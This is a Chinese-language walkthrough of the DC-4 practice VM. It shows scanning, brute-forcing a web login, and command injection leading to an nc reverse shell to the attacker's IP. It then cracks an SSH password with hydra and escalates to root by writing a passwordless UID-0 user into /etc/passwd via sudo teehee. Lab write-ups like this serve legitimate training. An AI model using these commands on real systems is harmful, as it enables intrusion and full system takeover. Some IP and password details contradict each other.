Vulhub 练习 DC-4靶机完整复现
2024-3-11 13:12:38 Author: www.freebuf.com(查看原文) 阅读量:13 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

1.工具

kali:攻击机 IP地址:192.168.200.4

DC-4:靶机 IP地址:暂时未知

2.注意

这里搭建环境两台机器应该选用同类的网络连接方式:这里两台的连接方式为模式

1.主机发现

找寻同网段下存活的主机(可以根据DC-4的MAC地址看扫描出来的IP地址)

arp-scan -l  #第一种方式

1706592913_65b88a913813e9b2dec95.png!small?1706592913890

nmap -sP 192.168.200.0/24 -T4 # 第二种方式

1706592924_65b88a9c52a3eb3c4405b.png!small?1706592924870

2.端口扫描

查看此主机开放了哪些可以利用的端口信息

nmap -sV -p-  192.168.200.9

1706592937_65b88aa948833010fa352.png!small?1706592937787

3.后台目录扫描

1706592944_65b88ab094bd32d6b957f.png!small?1706592944921

4.网站指纹

通过以下两种方式可以准确知道网站的框架信息

①先登录网页,利用火狐插件查看

1706592955_65b88abb1efb99969b728.png!small?1706592955592

利用kali中的指纹识别命令whatweb扫描

1706592962_65b88ac29e151cc615488.png!small?1706592963006

网页提示信息是需要以admin用户进行登录的,那么现在只需要搞到密码就行

1706592970_65b88aca7b0454718df45.png!small?1706592970831

3.爆破密码

①暴力破解

1706592978_65b88ad2e641ba8d8dd69.png!small?1706592979356

得知password:happy

点击对应单选项,然后RUN发现是执行了每种ls指令,用BURP抓包

1706592865_65b88a619554e77caf9f3.png!small?1706592867523

linux中的操作指令

1706592993_65b88ae1a23328c0fda81.png!small?1706592994155

试试其他经典指令,比如whoami、ip addr这种的

看不到明显的信息,倒是可以知道此指令是可以执行的(页面200)

1706593003_65b88aeb228fba19227a8.png!small?1706593003662

还有一种就是在前端代码中寻找RUN时执行的对应指令,修改

尝试修改一下前端指令

1706593013_65b88af51998e238b7a6b.png!small?1706593013671

一样的效果

1706593023_65b88aff7f21470e498ff.png!small?1706593023818

1、首先在kali当中,使用nc进行端口监听

nc -lvvp 8899

1706593032_65b88b087c978cf9f3c87.png!small?1706593033269

2、修改命令 ,修改完后点击Go即可

nc 192.168.200.3 8899 -e /bin/bash 
#nc命令使用的是kali渗透机的ip地址,端口号需要和你上方nc监听端口一致

1706593043_65b88b132848d6363c7b4.png!small?1706593043663

3、回到kali,这是低权限用户

1706593051_65b88b1bacefecc020cb2.png!small?1706593052305

4.使用python的交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

方便我们操作,避免因为退出而导致需要重新或许使用nc反弹shell
应该是三个人名:charles jim sam

经查看old-passowrd.bak是一个密码文件,只有jim下有东西,其他的两个目录下都为空

1706593061_65b88b250643adbc8d5be.png!small?1706593061535

这是test.sh中的句子翻译,应该是暴力破解,而密码文件应该就在同级目录的那个文件当中

1706593071_65b88b2f1a10650ab2630.png!small?1706593071425

5、破解jim用户密码

,把old-passowrd.bak复制到kali中,使用hydra进行爆破,

hydra -l jim -P /home/kali/123.txt  ssh://192.168.200.9

需要等几分钟,得到密码

1706593080_65b88b383c39ce1208b2c.png!small?1706593080994

账号:jim

密码:jibr104

[22][ssh] host: 192.168.200.9   login: jim   password: jibril04

6、连接成功

1706593089_65b88b417df183dd8f87b.png!small?1706593090124

1706593097_65b88b498835475b27851.png!small?1706593097886

进入 到邮件目录

cd /var/mail 里

1706593104_65b88b502f8ef7d368a16.png!small?1706593104693

结尾可以看到是charles发来的信息,登录密码:^xHhA&hvim0y,切换登陆看看su charles

一些目录被限制了权限,进行提升权限

1706593111_65b88b576f905597dee92.png!small?1706593111870

权限提升

先用sudo -l看看自己有什么权限

teehee这个用户是不需要用密码登录的。

1706593119_65b88b5f5851ba57be8cd.png!small?1706593119727

添加一个无密码用户,并使用teehee执行写入 passwd中

echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息命令解释程序(Shell)


添加一个用户,使用teehee执行写入到/etc/passwd中,加入到root权限组中

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
参数解释
#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
"-a" 选项的作用等同于 ">>" 命令

1706593131_65b88b6bb8b50cf5b1d0e.png!small?1706593132309

无密码直接登录账号admin

1706593138_65b88b7240b4849601536.png!small?1706593139722

文章复现参考:https://blog.csdn.net/liver100day/article/details/117707129

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022


文章来源: https://www.freebuf.com/articles/web/390958.html
如有侵权请联系:admin#unsafe.sh